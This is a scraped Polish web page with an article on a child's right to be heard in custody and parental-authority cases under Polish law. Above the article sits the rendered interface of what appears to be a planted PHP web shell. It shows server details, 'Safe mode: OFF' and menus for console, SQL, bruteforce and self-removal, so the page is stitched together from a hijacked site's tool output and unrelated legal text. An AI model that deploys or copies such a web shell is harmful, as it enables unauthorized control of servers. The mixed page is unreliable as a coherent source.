W Stronę Ojca i no co ty Tato
BlackUniX
Uname
User
Php
Hdd
Cwd
:Linux v217.home.net.pl 4.0.6 brocade-gut #36 SMP Thu May 19 16:53:59 CEST 2016 x86_64 [Google] [milw0rm]
: ( ) Group: ( )
:5.3.29 Safe mode: OFF [ phpinfo ] Datetime: 2018-06-20 11:19:14
:1 B Free: B (0%)
: u--------- [ home ]
:

Server IP:
79.96.17.51
Client IP:
54.198.158.24
[ Sec. Info ][ Files ][ Console ][ Sql ][ Php ][ Safe mode ][ String tools ][ Bruteforce ][ Network ][ Self remove ]

File manager

Can't open this folder!

Dziecko ma głos przed sądem
08.07.2008.
Zgodnie z ratyfikowaną przez Polskę Konwencją o Prawach Dziecka w sprawach dotyczących władzy rodzicielskiej i kontaktów z dzieckiem po rozwodzie sąd powinien wysłuchać dziecko.
 

Konwencja o prawach dziecka zobowiązuje państwa będące jej stronami dozapewnienia dziecku prawa do swobodnego wyrażania własnych poglądów we wszystkich sprawach go dotyczących. Konwencja każe zapewnić dziecku przede wszystkim możliwość wypowiadaniasię w każdym postępowaniu sądowym i administracyjnym go dotyczącym –bezpośrednio lub za pośrednictwem przedstawiciela bądź odpowiedniegoorganu. Sposób wypełnienia tego obowiązku konwencja pozostawiła uregulowaniom wewnętrznym państw.
W Polsce małoletnie dziecko jednak nie ma formalnego statusu uczestnika w dotyczących go sprawach rodzinnych, co potwierdził to Sąd Najwyższy w postanowieniu z 16 grudnia 1997 r. (sygn. III CZP 63/97). W polskiej procedurze możliwość tę zapewnia art. 573 KPC, który przyznaje prawo do występowania i zgłaszania wniosków w sprawach rodzinnych i opiekuńczych dzieciom, które ukończyły 13. rok życia.

Wysłuchanie dziecka w tym wypadku jest obowiązkiem sądu,  a więc dziecko powyżej 13 roku życia powinno wypowiedzieć się również w sprawie o zmianę w wykonywaniu władzy rodzicielskiej czy o jej pozbawienie, o adopcję itd. Zaniechanie tego może być istotnym uchybieniem i jeśli miało wpływ na wynik sprawy, uzasadni uchylenie werdyktu.
Dopuszcza się jednak odstępstwo od tej zasady. Sąd ma prawo do ograniczenia lub wyłączenia osobistego udziału małoletniego w postępowaniu, jeżeli przemawiają za tym względy wychowawcze. Sąd na mocy tego samego art 537 KPC może zadecydować, że dziecko będzie wysłuchane poza salą sądową. Może zapoznać się z opinią dziecka poprzez kuratora albo za pośrednictwem opinii ośrodka diagnostyczno-konsultacyjnego, czy wreszcie opinii biegłego psychologa.
To sąd jednak ostatecznie decyduje co jest dobrem dziecka, może więc uznać, że to, czego chce dziecko, nie jest zgodne z jego dobrem i jego zdania nie uwzględnić.

Źródło : Rzeczpospolita

 
« poprzedni artykuł   następny artykuł »

komentarze

Jeszcze nie ma komentarzy - dodaj swój używając poniższego formularza...


Strona 1 z 0 ( 0 komentarze )
©2006 MosCom

Musisz się zalogować.

Logowanie

Login

Hasło

Remember me?
Zapomniane hasło?
Załóż konto

Tatusiowe menu

Nasze Forum
Weekendowy Tata
Co zmieniu nowelizacja KRiO?
 
Czy opieka wspólna po rozwodzie to dobre rozwiązanie dla dziecka?
 
Czy znasz nowy kodeks rodzinny?
 
Czy nasze państwo realnie wspiera równouprawnienie w życiu rodzinnym?
 


Dotacja
  Kwota [PLN]Ostatnio nadesłane:


20.06.2018.